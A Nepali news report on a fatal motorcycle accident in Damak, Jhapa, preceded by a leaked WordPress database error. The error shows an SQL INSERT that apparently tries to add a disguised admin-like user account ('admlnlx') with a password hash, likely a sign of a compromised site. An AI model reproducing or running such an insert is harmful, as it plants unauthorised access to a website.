WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhnWRIH25hS2sf1WuexUQSaTYEEFcf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 11:42:39', '', 'admlnlx', 'admlnlx')
दमक,माघ ४ –
मोटरसाइकलको ठक्करबाट झापाको दमकमा गएराति एकजना पैदलयात्रीको मृत्यु भएको छ ।
पूर्वपश्चिम राजमार्गको दमक–७ स्थित सडकखण्डमा पूर्व जाँदै गरेको बा ६१ प ५९६१ नंको मोटरसाइकलले ठक्कर दिँदा पैदलयात्री दमक–१६ का ५५ वर्षीय प्रेम पुरीको मृत्यु भएको हो ।
बाटो काट्ने क्रममा मोटरसाइकलको ठक्करबाट गम्भीर घाइते बनेका पुरीको दमकस्थित लाइफलाइन अस्पतालमा उपचारका क्रममा मृत्यु भएको इलाका प्रहरी कार्यालय दमकले जनाएको छ ।
दुर्घटनामा परी मोटरसाइकलका चालक मकवानपुर हरिखोला–२ का २६ वर्षीय रोहित मोक्तान र पछाडि सवार उनकी दिदी मोरङ बयरवन–५ की ४० वर्षीया बबिता माझी गम्भीर घाइते भएका छन् । घाइते दिदीभाइको विराटनगरस्थित न्यूरो अस्पतालमा उपचार भइरहेको छ । – रासस